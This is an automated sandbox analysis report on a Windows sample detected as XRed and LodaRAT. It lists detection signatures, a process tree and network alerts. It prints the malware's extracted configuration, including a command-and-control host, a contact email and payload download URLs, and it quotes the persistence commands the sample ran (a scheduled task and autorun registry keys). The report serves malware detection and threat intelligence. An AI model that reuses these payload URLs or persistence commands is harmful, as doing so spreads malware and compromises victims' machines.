Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LWQDFZ.exe

Overview

General Information

Sample name:LWQDFZ.exe
Analysis ID:1582337
MD5:27bcc0d927e9f13250b1dff9e122e9af
SHA1:2f9f09f46fe7ee2a495247292b3f2be0777c2873
SHA256:71c45be1d4e8d17aee605f93ee991d9117572e1f79c8991bfa2f7b37b285b5f1
Tags:exeknkbkk212user-JAMESWT_MHT
Infos:

Detection

LodaRAT, XRed
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LodaRAT
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

Process Tree

  • System is w10x64
  • LWQDFZ.exe (PID: 7352 cmdline: "C:\Users\user\Desktop\LWQDFZ.exe" MD5: 27BCC0D927E9F13250B1DFF9E122E9AF)
    • ._cache_LWQDFZ.exe (PID: 7436 cmdline: "C:\Users\user\Desktop\._cache_LWQDFZ.exe" MD5: 541FC19BE6471027AFB1DD324E4A8A80)
      • cmd.exe (PID: 7568 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7624 cmdline: schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 7632 cmdline: WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs MD5: FF00E0480075B095948000BDC66E81F0)
    • Synaptics.exe (PID: 7464 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 84A6CCB0838DA0E05CC6763275C2EE1C)
      • WerFault.exe (PID: 5528 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 12448 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 6196 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 12508 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 2960 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 12500 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 7544 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • KQNALS.exe (PID: 7720 cmdline: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe MD5: 541FC19BE6471027AFB1DD324E4A8A80)
  • KQNALS.exe (PID: 280 cmdline: "C:\Users\user\AppData\Roaming\Windata\KQNALS.exe" MD5: 541FC19BE6471027AFB1DD324E4A8A80)
  • Synaptics.exe (PID: 1880 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 84A6CCB0838DA0E05CC6763275C2EE1C)
  • KQNALS.exe (PID: 7420 cmdline: "C:\Users\user\AppData\Roaming\Windata\KQNALS.exe" MD5: 541FC19BE6471027AFB1DD324E4A8A80)
  • KQNALS.exe (PID: 7736 cmdline: "C:\Users\user\AppData\Roaming\Windata\KQNALS.exe" MD5: 541FC19BE6471027AFB1DD324E4A8A80)
  • KQNALS.exe (PID: 2596 cmdline: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe MD5: 541FC19BE6471027AFB1DD324E4A8A80)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Loda, LodaRATLoda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.loda

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
LWQDFZ.exeJoeSecurity_XRedYara detected XRedJoe Security
    LWQDFZ.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\MHDFGY.vbsJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
        C:\ProgramData\Synaptics\RCXFBD9.tmpJoeSecurity_XRedYara detected XRedJoe Security
          C:\ProgramData\Synaptics\RCXFBD9.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            C:\Users\user\Documents\AIXACVYBSB\~$cache1JoeSecurity_XRedYara detected XRedJoe Security
              C:\Users\user\Documents\AIXACVYBSB\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                Click to see the 2 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000003.00000003.1511897808.000000000074E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                  00000002.00000002.3037281317.00000000042E7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                    00000000.00000000.1390370601.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                      00000000.00000000.1390370601.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                        00000008.00000002.3020785623.0000000003488000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                          Click to see the 7 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.0.LWQDFZ.exe.400000.0.unpackJoeSecurity_XRedYara detected XRedJoe Security
                            0.0.LWQDFZ.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Potentially Suspicious Malware Callback Communication
                              Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DesusertionIp: 172.111.138.100, DesusertionIsIpv6: false, DesusertionPort: 5552, EventID: 3, Image: C:\Users\user\Desktop\._cache_LWQDFZ.exe, Initiated: true, ProcessId: 7436, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49714
                              Sigma detected: Script Interpreter Execution From Suspicious Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_LWQDFZ.exe" , ParentImage: C:\Users\user\Desktop\._cache_LWQDFZ.exe, ParentProcessId: 7436, ParentProcessName: ._cache_LWQDFZ.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, ProcessId: 7632, ProcessName: wscript.exe
                              Sigma detected: Suspicious Script Execution From Temp Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_LWQDFZ.exe" , ParentImage: C:\Users\user\Desktop\._cache_LWQDFZ.exe, ParentProcessId: 7436, ParentProcessName: ._cache_LWQDFZ.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, ProcessId: 7632, ProcessName: wscript.exe
                              Sigma detected: WScript or CScript Dropper
                              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_LWQDFZ.exe" , ParentImage: C:\Users\user\Desktop\._cache_LWQDFZ.exe, ParentProcessId: 7436, ParentProcessName: ._cache_LWQDFZ.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, ProcessId: 7632, ProcessName: wscript.exe
                              Sigma detected: CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Windata\KQNALS.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\._cache_LWQDFZ.exe, ProcessId: 7436, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MHDFGY
                              Sigma detected: Startup Folder File Write
                              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_LWQDFZ.exe, ProcessId: 7436, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MHDFGY.lnk
                              Sigma detected: Suspicious Schtasks From Env Var Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1, CommandLine: schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7568, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1, ProcessId: 7624, ProcessName: schtasks.exe
                              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                              Source: Process startedAuthor: Michael Haag: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_LWQDFZ.exe" , ParentImage: C:\Users\user\Desktop\._cache_LWQDFZ.exe, ParentProcessId: 7436, ParentProcessName: ._cache_LWQDFZ.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, ProcessId: 7632, ProcessName: wscript.exe
                              Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\LWQDFZ.exe, ProcessId: 7352, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                              Sigma detected: Office Macro File Creation
                              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 7464, TargetFilename: C:\Users\user\AppData\Local\Temp\c2jUHMi5.xlsm

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:25:24.988069+010020448871A Network Trojan was detected192.168.2.949713142.250.185.78443TCP
                              2024-12-30T11:25:24.990750+010020448871A Network Trojan was detected192.168.2.949712142.250.185.78443TCP
                              2024-12-30T11:25:26.056444+010020448871A Network Trojan was detected192.168.2.949718142.250.185.78443TCP
                              2024-12-30T11:25:26.056674+010020448871A Network Trojan was detected192.168.2.949719142.250.185.78443TCP
                              2024-12-30T11:25:27.032939+010020448871A Network Trojan was detected192.168.2.949725142.250.185.78443TCP
                              2024-12-30T11:25:27.130273+010020448871A Network Trojan was detected192.168.2.949724142.250.185.78443TCP
                              2024-12-30T11:25:28.294363+010020448871A Network Trojan was detected192.168.2.949731142.250.185.78443TCP
                              2024-12-30T11:25:28.441965+010020448871A Network Trojan was detected192.168.2.949732142.250.185.78443TCP
                              2024-12-30T11:25:29.692255+010020448871A Network Trojan was detected192.168.2.949742142.250.185.78443TCP
                              2024-12-30T11:25:29.761749+010020448871A Network Trojan was detected192.168.2.949744142.250.185.78443TCP
                              2024-12-30T11:25:30.704750+010020448871A Network Trojan was detected192.168.2.949747142.250.185.78443TCP
                              2024-12-30T11:25:30.731735+010020448871A Network Trojan was detected192.168.2.949749142.250.185.78443TCP
                              2024-12-30T11:25:31.923473+010020448871A Network Trojan was detected192.168.2.949752142.250.185.78443TCP
                              2024-12-30T11:25:31.932583+010020448871A Network Trojan was detected192.168.2.949754142.250.185.78443TCP
                              2024-12-30T11:25:32.707722+010020448871A Network Trojan was detected192.168.2.949757142.250.185.78443TCP
                              2024-12-30T11:25:32.707813+010020448871A Network Trojan was detected192.168.2.949758142.250.185.78443TCP
                              2024-12-30T11:25:33.938549+010020448871A Network Trojan was detected192.168.2.949762142.250.185.78443TCP
                              2024-12-30T11:25:33.971633+010020448871A Network Trojan was detected192.168.2.949764142.250.185.78443TCP
                              2024-12-30T11:25:35.104833+010020448871A Network Trojan was detected192.168.2.949769142.250.185.78443TCP
                              2024-12-30T11:25:35.117302+010020448871A Network Trojan was detected192.168.2.949771142.250.185.78443TCP
                              2024-12-30T11:25:36.144331+010020448871A Network Trojan was detected192.168.2.949773142.250.185.78443TCP
                              2024-12-30T11:25:36.148561+010020448871A Network Trojan was detected192.168.2.949772142.250.185.78443TCP
                              2024-12-30T11:25:37.718341+010020448871A Network Trojan was detected192.168.2.949785142.250.185.78443TCP
                              2024-12-30T11:25:37.819807+010020448871A Network Trojan was detected192.168.2.949784142.250.185.78443TCP
                              2024-12-30T11:25:38.987363+010020448871A Network Trojan was detected192.168.2.949787142.250.185.78443TCP
                              2024-12-30T11:25:39.121172+010020448871A Network Trojan was detected192.168.2.949790142.250.185.78443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:25:23.838165+010028221161Malware Command and Control Activity Detected192.168.2.949714172.111.138.1005552TCP
                              2024-12-30T11:26:18.635902+010028221161Malware Command and Control Activity Detected192.168.2.949961172.111.138.1005552TCP
                              2024-12-30T11:26:55.572883+010028221161Malware Command and Control Activity Detected192.168.2.949973172.111.138.1005552TCP
                              2024-12-30T11:27:44.167160+010028221161Malware Command and Control Activity Detected192.168.2.949979172.111.138.1005552TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:25:25.431526+010028326171Malware Command and Control Activity Detected192.168.2.94971769.42.215.25280TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:25:05.075916+010028498851Malware Command and Control Activity Detected192.168.2.949947172.111.138.1005552TCP
                              2024-12-30T11:25:05.075916+010028498851Malware Command and Control Activity Detected192.168.2.949978172.111.138.1005552TCP
                              2024-12-30T11:25:05.075916+010028498851Malware Command and Control Activity Detected192.168.2.949963172.111.138.1005552TCP
                              2024-12-30T11:25:05.075916+010028498851Malware Command and Control Activity Detected192.168.2.949975172.111.138.1005552TCP
                              2024-12-30T11:25:05.075916+010028498851Malware Command and Control Activity Detected192.168.2.949858172.111.138.1005552TCP
                              2024-12-30T11:25:05.075916+010028498851Malware Command and Control Activity Detected192.168.2.949974172.111.138.1005552TCP
                              2024-12-30T11:25:05.075916+010028498851Malware Command and Control Activity Detected192.168.2.949970172.111.138.1005552TCP
                              2024-12-30T11:25:05.075916+010028498851Malware Command and Control Activity Detected192.168.2.949961172.111.138.1005552TCP
                              2024-12-30T11:25:05.075916+010028498851Malware Command and Control Activity Detected192.168.2.949763172.111.138.1005552TCP
                              2024-12-30T11:25:05.075916+010028498851Malware Command and Control Activity Detected192.168.2.949973172.111.138.1005552TCP
                              2024-12-30T11:25:05.075916+010028498851Malware Command and Control Activity Detected192.168.2.949979172.111.138.1005552TCP
                              2024-12-30T11:25:05.075916+010028498851Malware Command and Control Activity Detected192.168.2.949714172.111.138.1005552TCP
                              2024-12-30T11:25:05.075916+010028498851Malware Command and Control Activity Detected192.168.2.949969172.111.138.1005552TCP
                              2024-12-30T11:25:05.075916+010028498851Malware Command and Control Activity Detected192.168.2.949980172.111.138.1005552TCP
                              2024-12-30T11:25:05.075916+010028498851Malware Command and Control Activity Detected192.168.2.949900172.111.138.1005552TCP
                              2024-12-30T11:25:05.075916+010028498851Malware Command and Control Activity Detected192.168.2.949810172.111.138.1005552TCP
                              2024-12-30T11:25:23.838165+010028498851Malware Command and Control Activity Detected192.168.2.949714172.111.138.1005552TCP
                              2024-12-30T11:25:32.916466+010028498851Malware Command and Control Activity Detected192.168.2.949763172.111.138.1005552TCP
                              2024-12-30T11:25:42.354112+010028498851Malware Command and Control Activity Detected192.168.2.949810172.111.138.1005552TCP
                              2024-12-30T11:25:51.447538+010028498851Malware Command and Control Activity Detected192.168.2.949858172.111.138.1005552TCP
                              2024-12-30T11:26:00.494591+010028498851Malware Command and Control Activity Detected192.168.2.949900172.111.138.1005552TCP
                              2024-12-30T11:26:09.557313+010028498851Malware Command and Control Activity Detected192.168.2.949947172.111.138.1005552TCP
                              2024-12-30T11:26:18.635902+010028498851Malware Command and Control Activity Detected192.168.2.949961172.111.138.1005552TCP
                              2024-12-30T11:26:27.682320+010028498851Malware Command and Control Activity Detected192.168.2.949963172.111.138.1005552TCP
                              2024-12-30T11:26:37.051771+010028498851Malware Command and Control Activity Detected192.168.2.949969172.111.138.1005552TCP
                              2024-12-30T11:26:46.088465+010028498851Malware Command and Control Activity Detected192.168.2.949970172.111.138.1005552TCP
                              2024-12-30T11:26:55.572883+010028498851Malware Command and Control Activity Detected192.168.2.949973172.111.138.1005552TCP
                              2024-12-30T11:27:04.635470+010028498851Malware Command and Control Activity Detected192.168.2.949974172.111.138.1005552TCP
                              2024-12-30T11:27:14.049429+010028498851Malware Command and Control Activity Detected192.168.2.949975172.111.138.1005552TCP
                              2024-12-30T11:27:30.214088+010028498851Malware Command and Control Activity Detected192.168.2.949978172.111.138.1005552TCP
                              2024-12-30T11:27:44.167160+010028498851Malware Command and Control Activity Detected192.168.2.949979172.111.138.1005552TCP
                              2024-12-30T11:27:53.229380+010028498851Malware Command and Control Activity Detected192.168.2.949980172.111.138.1005552TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: LWQDFZ.exeAvira: detected
                              Source: LWQDFZ.exeAvira: detected
                              Antivirus detection for URL or domain
                              Source: http://xred.site50.net/syn/Synaptics.rarhAvira URL Cloud: Label: malware
                              Source: http://xred.site50.net/syn/SSLLibrary.dlDAvira URL Cloud: Label: malware
                              Antivirus detection for dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\ProgramData\Synaptics\RCXFBD9.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\ProgramData\Synaptics\RCXFBD9.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\Users\user\Documents\AIXACVYBSB\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\Users\user\Documents\AIXACVYBSB\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\Users\user\AppData\Local\Temp\MHDFGY.vbsAvira: detection malicious, Label: VBS/Runner.VPJI
                              Found malware configuration
                              Source: LWQDFZ.exeMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                              Multi AV Scanner detection for dropped file
                              Source: C:\ProgramData\Synaptics\RCXFBD9.tmpReversingLabs: Detection: 100%
                              Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 92%
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeReversingLabs: Detection: 52%
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeReversingLabs: Detection: 52%
                              Source: C:\Users\user\Documents\AIXACVYBSB\~$cache1ReversingLabs: Detection: 100%
                              Multi AV Scanner detection for submitted file
                              Source: LWQDFZ.exeReversingLabs: Detection: 92%
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 85.9% probability
                              Machine Learning detection for dropped file
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeJoe Sandbox ML: detected
                              Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                              Source: C:\ProgramData\Synaptics\RCXFBD9.tmpJoe Sandbox ML: detected
                              Source: C:\Users\user\Documents\AIXACVYBSB\~$cache1Joe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: LWQDFZ.exeJoe Sandbox ML: detected
                              Source: LWQDFZ.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49712 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49713 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49721 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49720 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49725 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49724 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49742 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49744 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49748 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49750 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49757 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49758 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49785 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.9:49784 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49788 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.9:49789 version: TLS 1.2
